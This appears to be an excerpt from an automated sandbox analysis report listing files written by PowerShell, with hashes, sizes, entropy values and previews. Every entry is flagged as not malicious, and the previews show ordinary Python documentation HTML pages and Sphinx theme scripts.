    SHA-256:096231E9C87DF80EC3273DA9C5B71BC81503206726A07A4DD4DE44C256FF859C
    SHA-512:809358B719AD7F27439E2302E04508A9DBE8CF39723CEF45D3057B23D5673A4024B65B7758A69B49AABF807C1F1A42930874468A7AFBA5539776491049EBF4A7
    Malicious:false
    Reputation:unknown
    Preview:/* Highlighting utilities for Sphinx HTML documentation. */."use strict";..const SPHINX_HIGHLIGHT_ENABLED = true../**. * highlight a given string on a node by wrapping it in. * span elements with the given class name.. */.const _highlight = (node, addItems, text, className) => {. if (node.nodeType === Node.TEXT_NODE) {. const val = node.nodeValue;. const parent = node.parentNode;. const pos = val.toLowerCase().indexOf(text);. if (. pos >= 0 &&. !parent.classList.contains(className) &&. !parent.classList.contains("nohighlight"). ) {. let span;.. const closestNode = parent.closest("body, svg, foreignObject");. const isInSVG = closestNode && closestNode.matches("svg");. if (isInSVG) {. span = document.createElementNS("http://www.w3.org/2000/svg", "tspan");. } else {. span = document.createElement("span");. span.classList.add(className);. }.. span.appendChild(document.createTextNode(val.substr(pos, text.
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text
    Category:dropped
    Size (bytes):779
    Entropy (8bit):4.698991607713142
    Encrypted:false
    SSDEEP:
    MD5:4B5EEF9423B62E66EB345DC601BFC288
    SHA1:5ED1C79C5A3573B233A74D344D2E2A720D433B5B
    SHA-256:E83D4B134C20F038CF3FBEFAFCAC4F0B15DD224FA0189257E436291C52C6D54C
    SHA-512:28D938C7308522E2BE6BEFD230FC74CE7119C0DEFC3054951DF529412CC143C94D62FEAF1643DF0F55EB92A9992775184211425057CD5A470253136A4054CB30
    Malicious:false
    Reputation:unknown
    Preview:const pydocthemeDark = document.getElementById('pydoctheme_dark_css').const pygmentsDark = document.getElementById('pygments_dark_css').const themeSelectors = document.getElementsByClassName('theme-selector')..function activateTheme(theme) {. localStorage.setItem('currentTheme', theme);. [...themeSelectors].forEach(e => e.value = theme). switch (theme) {. case 'light':. pydocthemeDark.media = 'not all'. pygmentsDark.media = 'not all'. break;. case 'dark':. pydocthemeDark.media = 'all'. pygmentsDark.media = 'all'. break;. default:. // auto. pydocthemeDark.media = '(prefers-color-scheme: dark)'. pygmentsDark.media = '(prefers-color-scheme: dark)'. }.}..activateTheme(localStorage.getItem('currentTheme') || 'auto').
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
    Category:dropped
    Size (bytes):14755
    Entropy (8bit):4.825013643605692
    Encrypted:false
    SSDEEP:
    MD5:6DECA5ED947F3B43B2088EB4CB82B47C
    SHA1:B0F6E8E262153DDDAD5EBCAC82A1DD6419BC5904
    SHA-256:C4B77A791522911C51966D765048CE9716580E6212E39AC95B359BF785EA3E40
    SHA-512:8DA915C66A2A346FC948A1B8FECD69BEEABB948C24A48DCAEA4AF0A99361392F69D10329540BFAE7A4CD147B95ADF46E6CA0BF4D0CE38F9C7CA8342C6E0D0565
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="About these documents" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/about.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These documents are generated from reStructuredText sources by Sphinx, a document processor specifically written for the Python documentation. Development of the documentation and its toolchain is ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These documents are generated from reStructuredText sources by Sphinx,
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
    Category:modified
    Size (bytes):19744
    Entropy (8bit):4.88174789711368
    Encrypted:false
    SSDEEP:
    MD5:194ECA6A70F0693649A0C17564B5A6C8
    SHA1:9D67F7A4F04AC3DCBAC0C9A77FFE37DC83B11C7B
    SHA-256:45E1E40288B4098D792AEE858152016A3FDED0AF79B7FD78912B65E411477CAB
    SHA-512:0D9418EB1C55DF587A582E00339BDED3648CECDFAD4793F78A3D4B2E4AF4AC36C09302A8DBB745673361D85523955113FFFDD1731FA93494A7848756C8129B60
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Dealing with Bugs" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/bugs.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python is a mature programming language which has established a reputation for stability. In order to maintain this reputation, the developers would like to know of any deficiencies you find in Pyt..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python is a mature programming language which has established a reputation
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
    Category:dropped
    Size (bytes):16603
    Entropy (8bit):4.856697584687944
    Encrypted:false
    SSDEEP:
    MD5:57170BC017FABA6BAA30E47676F0B82F
    SHA1:5545C292125A4F2057213D2B0024FD4738AB4CDF
    SHA-256:CB71F3FCCCB711792D6CDCEC50FF1D523FA3AE0B8B76B9973E66452C5E7A84A6
    SHA-512:61849E81416B07B31B3F11B7E3DA712F0ECA8DE92E2F13848B048D38E910F0983739B1E7AC4C0F97E8AA9E23BA72713CFFCBE60414C4F08A8DC4DBF283D6401C
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Abstract Objects Layer" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/abstract.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The functions in this chapter interact with Python objects regardless of their type, or with wide classes of object types (e.g. all numerical types, or all sequence types). When used on object type..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The functions in this chapter interact with Python objects
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1254), with CRLF line terminators
    Category:dropped
    Size (bytes):23547
    Entropy (8bit):4.905608536545633
    Encrypted:false
    SSDEEP:
    MD5:BD845DBEED53B8C79994EB0FA130C66D
    SHA1:F97B5C0B18C05805EA447692BC7A53F8B6C6149A
    SHA-256:894F17F9D88D1D25D968CF1240D950FBE7C92B6E31640D1BA2670DC1A5FBA83D
    SHA-512:B89B4A4D1CA716F73FA2D34024B9AED86606D6FFE1543140C39779F27FA9D991B1A2AF66B51A75E3A72F52A2F55BDB41F897981AF4369BACC8AC744220054E7C
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Allocating Objects on the Heap" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/allocation.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Allocating Objects on the Heap &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="st
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (423), with CRLF line terminators
    Category:dropped
    Size (bytes):20544
    Entropy (8bit):4.946657739990355
    Encrypted:false
    SSDEEP:
    MD5:3795D5DB681C6B3E5025F2C3DF00DD01
    SHA1:0539C578532C3DB3C44CE08EDF57CD386E288AEA
    SHA-256:5C5BB14B151D7EF802500A8AE3BE4285E929A88D096733EE930228BB1DB0803D
    SHA-512:B218C957BDB79D9592297AB3499093448C90A5A07989D9E7B1C8964DAB4C8C30413017F2DB4B176D0108EB509365B8CE1570522DB478048D5164D7697339246F
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="API and ABI Versioning" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/apiabiversion.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="CPython exposes its version number in the following macros. Note that these correspond to the version code is built with, not necessarily the version used at run time. See C API Stability for a dis..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="CPython exposes its version number in the following ma
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1573), with CRLF line terminators
    Category:dropped
    Size (bytes):105280
    Entropy (8bit):4.817954471982983
    Encrypted:false
    SSDEEP:
    MD5:75E56C71F8C49F3EFB2973D14F1B8D93
    SHA1:AFB958E3408E1D5BB1422F55F40B24C54F28076F
    SHA-256:8A7E2FFC0F44AAFD08D9C7DE0D5D6428FE2F213AE000F0EB5029437975D94510
    SHA-512:F880B23EA38720EB35838C46B3AD63DDB14F73A98E805F40F0D1E8C352B5CBC48820EF40C053407751BDE5A93FFC7B4AC0B3375F72AC931248540F23F19DD49F
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Parsing arguments and building values" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/arg.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These functions are useful when creating your own extensions functions and methods. Additional information and examples are available in Extending and Embedding the Python Interpreter. The first th..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These functions are useful when creating your own
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1218), with CRLF line terminators
    Category:dropped
    Size (bytes):228040
    Entropy (8bit):4.84968154443352
    Encrypted:false
    SSDEEP:
    MD5:B352AFA08B6AAD5FA2A57A365A5F58BD
    SHA1:55E6F710AAB95B5FB65C010A523FA9791DA1801D
    SHA-256:39711E0FF96C99A885C2E30DFDFB24CED3C3B333164C0D33CA2EAA216459F185
    SHA-512:9B21E1367D3DF27953A06EA33FE9D1872941DDAE6B081C1338DA74762838C8D005EED64C586790F83A437B1F87D5CCA117A91B84DFC4794684E766ED85372C27
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python Initialization Configuration" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/init_config.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python can be initialized with Py_InitializeFromConfig() and the PyConfig structure. It can be preinitialized with Py_PreInitialize() and the PyPreConfig structure. There are two kinds of configura..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python can be initialized with Py_Initializ
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (626), with CRLF line terminators
    Category:dropped
    Size (bytes):106771
    Entropy (8bit):4.859201129994066
    Encrypted:false
    SSDEEP:
    MD5:A7EAE0AF8AEED9287CD40553A9FCB0B4
    SHA1:ECB2BF6B24A06BBB530FC9192E13C34E5D104919
    SHA-256:1CC1227EC4DAA4C12D6D6783A0BD93479F2C65ECF6E22D4DF734D824F576665D
    SHA-512:1A6943D815B4F5A5043CB92C51D8AD31DEAF13C4FBCE962E8A9DEFBFAB2AEA41DEDA61D5E3E25B24DD1BEAEC51FD0444A3DF21285BD61E868FAAB96CF9C4FBF0
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Introduction" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/intro.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The Application Programmer.s Interface to Python gives C and C++ programmers access to the Python interpreter at a variety of levels. The API is equally usable from C++, but for brevity it is gener..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The Application Programmer.s Interface to Python gives C and C++ pro
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1269), with CRLF line terminators
    Category:dropped
    Size (bytes):22462
    Entropy (8bit):4.867850146969797
    Encrypted:false
    SSDEEP:
    MD5:E3C31E23767226555F438B0D0F105B87
    SHA1:538FB61B5DA0671ECD91A181A4D9D630127972A7
    SHA-256:A328EA7B34488C00ED1DBF7F326E3D4719CCD7CFEC7C89C8A04A0BC782A2DCCA
    SHA-512:AD8B76CE307098B155B47517075F5AF06791F8BB6C1D81A84F521659109602EE5C174C522C06F0AB946BCB89238365BF0ABD2BCECC9922BC4ABC8B77FD8C4629
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Iterator Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/iter.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="There are two functions specifically for working with iterators. To write a loop which iterates over an iterator, the C code should look something like this:" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="There are two functions specifically for working with iterators. To write a loop which iterates over an iterato
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1016), with CRLF line terminators
    Category:dropped
    Size (bytes):20665
    Entropy (8bit):4.891099591900654
    Encrypted:false
    SSDEEP:
    MD5:1D73062207865B5516A43A0578D7D724
    SHA1:61EDB1ED38B1DB40840EEE6B6A338FE317EFD5DA
    SHA-256:5CB407E5E9E7548B280036951503FD7C7E556DEB153206A5866A2264AEBB478D
    SHA-512:585E9522C74F59EEFFA0494AA68C82137272F6129454AD548D1491123F5E46D3DD3FCF52AE4A8B4806DE1EA1480F0D6E66CDFFC09D860E2A4AFD6852277B08DD
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Iterator Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/iterator.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python provides two general-purpose iterator objects. The first, a sequence iterator, works with an arbitrary sequence supporting the__getitem__() method. The second works with a callable object an..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python provides two general-purpose iterator objects. The first,
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1315), with CRLF line terminators
    Category:dropped
    Size (bytes):38118
    Entropy (8bit):4.855039623443231
    Encrypted:false
    SSDEEP:
    MD5:64A4967382B9586728095F62947076C9
    SHA1:08C160C87AF093DB6AA296AA605E573078D6CE07
    SHA-256:CA8B3F7FA2FEA9133E628038C1DA11A18DAA768AE02EB4AA03C2E8D25C449C4A
    SHA-512:3BBB50B16CE7F6B0D7A49F329E5D6679089F5A9AE3FC616C7FACC9F49378951447B00963E6EFC87A561566CAB11303C71BA56618EA03B6E18351CD0434447C91
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="List Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/list.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>List Objects &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="../_static
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1093), with CRLF line terminators
    Category:dropped
    Size (bytes):72564
    Entropy (8bit):4.8669890321048666
    Encrypted:false
    SSDEEP:
    MD5:E4052F22EB7520397F2F0CB422DF43E8
    SHA1:A8B575C2D6D01347C134DFC759A33EA3B4FE08DF
    SHA-256:9EB760BD665F2F475C64AE01161C003D10E141B823704616ED0C283A00886EFC
    SHA-512:FF1FD1D746CBF347948B7599970127A52A156029A3C22B1145780053D0326675A095DC2F476C9D50180C6CA31E7CD45B758EBAD322F6A86142AF6EF93C658C9B
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Integer Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/long.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="All integers are implemented as .long. integer objects of arbitrary size. On error, most PyLong_As* APIs return(return type)-1 which cannot be distinguished from a number. Use PyErr_Occurred() to d..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="All integers are implemented as .long. integer objects of arbi
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1138), with CRLF line terminators
    Category:dropped
    Size (bytes):32689
    Entropy (8bit):4.876693781272095
    Encrypted:false
    SSDEEP:
    MD5:5B5A0C20BF99C44DB6DB0B7E5CB2B217
    SHA1:946218CB5B0EF8CCCB126F76147CCBD0DA15745E
    SHA-256:0CFB6374AF1AB7F3759A3F387283CEC14878D40F613792D51682F83802CDE039
    SHA-512:31455CF41F996F7F4A24C30B2EB9D5932868D579A39451C794A50733134B02C1D495D095B016C3D94DE9048F1030DAA9B8886C7A5F1E0885B6FD04B847D2F4C2
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Mapping Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/mapping.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="See also PyObject_GetItem(), PyObject_SetItem() and PyObject_DelItem()." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="See also PyObject_GetItem(), PyObject_SetItem() and PyObject_DelItem()." />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (980), with CRLF line terminators
    Category:dropped
    Size (bytes):27348
    Entropy (8bit):4.882288409260469
    Encrypted:false
    SSDEEP:
    MD5:34AE2B3BF34417AB6BCBCDF6D54D2650
    SHA1:AED9721711F9115E6239A7AEC6984062EF76D485
    SHA-256:D8ED281E602DC2E3CF261E722D4D0366C7D791D013BE125B29C04A1C0C724126
    SHA-512:1ADDC73E3394FBF4C2D261A6F6D6119A196A4E22C406BB91E6D7F161B32764F2DCDA5965AC6D71BDC4E18A2254A5491D90051B2FCD556E7006F7248C73FEA97E
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Data marshalling support" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/marshal.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These routines allow C code to work with serialized objects using the same data format as the marshal module. There are functions to write data into the serialization format, and additional functio..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These routines allow C code to work with serialized object
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (867), with CRLF line terminators
    Category:dropped
    Size (bytes):101591
    Entropy (8bit):4.904770652791002
    Encrypted:false
    SSDEEP:
    MD5:E7A109EEAEE6A04D2B153ADD299BF0EF
    SHA1:C5732E0431F612E6A76688C2705E61F88BEB1D29
    SHA-256:A75E8E0DFE8A657E47FE4EE6478C4DB12BC122167754B7368DFFB2283D40C264
    SHA-512:397B18447F846E8EB8EE7D84D231B1EAEE1FF9A9F79E8F5DCF7FA2398FDC041CBBEBA57C89AE2408BEDD7D1383E35E7C13962AD329A079AFF1EA5791FBAED7BB
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Memory Management" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/memory.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Overview: Memory management in Python involves a private heap containing all Python objects and data structures. The management of this private heap is ensured internally by the Python memory manag..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Overview: Memory management in Python involves a private heap cont
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1031), with CRLF line terminators
    Category:dropped
    Size (bytes):24626
    Entropy (8bit):4.951601243376123
    Encrypted:false
    SSDEEP:
    MD5:244D809BFB4BFA9ECC9361C29162D13D
    SHA1:0448CFD6C79901B82B6E8A100DEE779927AF2FDF
    SHA-256:AB57C79B33B47F78AA31E4A41A8CD5AF5AECAF39485338E32328098E3038240B
    SHA-512:1DB073C3DD566DB31EC42EAB69461A6CFB506D5CB9E849F46B4B11A0141F89D21D8D213267C59C1C8E2CA4C0006C4C8290FE3A3586CE2CB2EF16A5A4C97E0720
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="MemoryView objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/memoryview.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="A memoryview object exposes the C level buffer interface as a Python object which can then be passed around like any other object." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="A memoryview object exposes the C level buffer interface as a Python object which can then be passed around like any other object."
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1004), with CRLF line terminators
    Category:dropped
    Size (bytes):27464
    Entropy (8bit):4.912250905283024
    Encrypted:false
    SSDEEP:
    MD5:1CF1AE28A1AE7EB927CE3558A61EB152
    SHA1:203AEABF6A59396D82C0F52A5D2E945FE58A445D
    SHA-256:60FB9CA8B9A006068AB1BB14B8D367407479C45D1593BED7CCDB1570A7B7AA71
    SHA-512:1A54AD79888434202F144E7849A0ADC714BC4614B4992F78CDDA2EF23CD300786019E86A85AD59A98A2D0C056BEE090F3D1C05773F2CA1404327DE2B6C80F57E
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Instance Method Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/method.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="An instance method is a wrapper for a PyCFunction and the new way to bind a PyCFunction to a class object. It replaces the former call PyMethod_New(func, NULL, class). Method Objects: Methods are b..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="An instance method is a wrapper for a PyCFunction and the ne
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1019), with CRLF line terminators
    Category:dropped
    Size (bytes):105105
    Entropy (8bit):4.873253108646738
    Encrypted:false
    SSDEEP:
    MD5:4102859F18EB7FE49FD3247C6E2D132C
    SHA1:6F9B9B991025726136C26D626465F70D6354155F
    SHA-256:46F210E8AF5958292538FBF9CD3A158EFC04AD81A110D47421D5921843C9F4D8
    SHA-512:206FAD1D1D9296F5B2E9B463AAB58B099AF7C256EE5918CF012382530DB62E8B699EC810EF367E12807B084FCD26A39F3B8F667D5BEB3AF7595E849B37AA4CB3
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Module Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/module.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Initializing C modules: Modules objects are usually created from extension modules (shared libraries which export an initialization function), or compiled-in modules (where the initialization funct..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Initializing C modules: Modules objects are usually created from exte
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (396), with CRLF line terminators
    Category:dropped
    Size (bytes):15351
    Entropy (8bit):4.859041556775392
    Encrypted:false
    SSDEEP:
    MD5:13B5A9AEB89F18E1ECFEE8EF7D325601
    SHA1:972EC36277470B4DCFF3FDA5A6A0531B252BE8B2
    SHA-256:61DE1432B57FB12A5A5B84D8AA9E175C4E8A2A216CA801949AFAD2B68925F76B
    SHA-512:CEFAF7C7A87FA17E7B6E7B9EDE19BF76A9E7C2611E493303CEB3348A569204EF70123E74CE7074B3638227F774E7F62DF0C215D880C9933D87AE34D8D5225E5F
    Malicious:false
    Reputation:unknown
    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="The None Object" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/none.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Note that the PyTypeObject for None is not directly exposed in the Python/C API. Since None is a singleton, testing for object identity (using== in C) is sufficient. There is no PyNone_Check() func..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Note that the PyTypeObject for None is not directly exposed in the Pyt
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1284), with CRLF line terminators
    Category:dropped
    Size (bytes):78877
    Entropy (8bit):4.814032396933495
    Encrypted:false
